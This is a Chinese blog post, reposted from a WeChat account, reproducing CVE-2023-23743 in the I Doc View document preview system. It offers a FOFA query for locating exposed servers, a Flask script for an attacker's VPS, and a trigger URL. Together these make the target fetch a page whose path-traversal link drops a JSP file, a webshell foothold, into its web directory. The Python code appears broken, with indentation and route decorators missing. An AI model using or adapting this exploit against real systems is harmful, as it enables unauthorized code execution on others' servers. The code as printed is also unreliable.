一、免责声明:
本次文章仅限个人学习使用,如有非法用途均与作者无关,且行且珍惜;由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。谢谢!
二、产品介绍:
三、资产梳理:
fofa:title="I Doc View"
四、漏洞复现:
首先服务器启动一个index.html中放入一个href、img或者script定向到jsp木马,I Doc View会自动爬取我们的页面下载我们的木马。
1、使用python的起一个href定向到木马的index.html放到vps上
from flask import Flask
import argparse
parse = argparse.ArgumentParser()
parse.add_argument("-port", type=int, help="Save port.", default=8989)
args = parse.parse_args()
app = Flask(__name__)
def index():
return """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>title</title>
<link rel="stylesheet" href="..\..\..\docview\aaaa.jsp">
</head>
<body>
</body>
</html>"""
def jsp_file():
return '''<%
out.print("This is a vul test!");
%>'''
if __name__ == '__main__':
app.run(host="0.0.0.0", port=args.port)
保存为poc.py
pip install flask
启动:python poc.py -port 8989
poc:
http://target/html/2word?url=http://vps:8989/index.html
vps收到请求、响应即攻击成功:
原文始发于微信公众号(fly的渗透学习笔记):在线文档预览系统 CVE-2023-23743
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论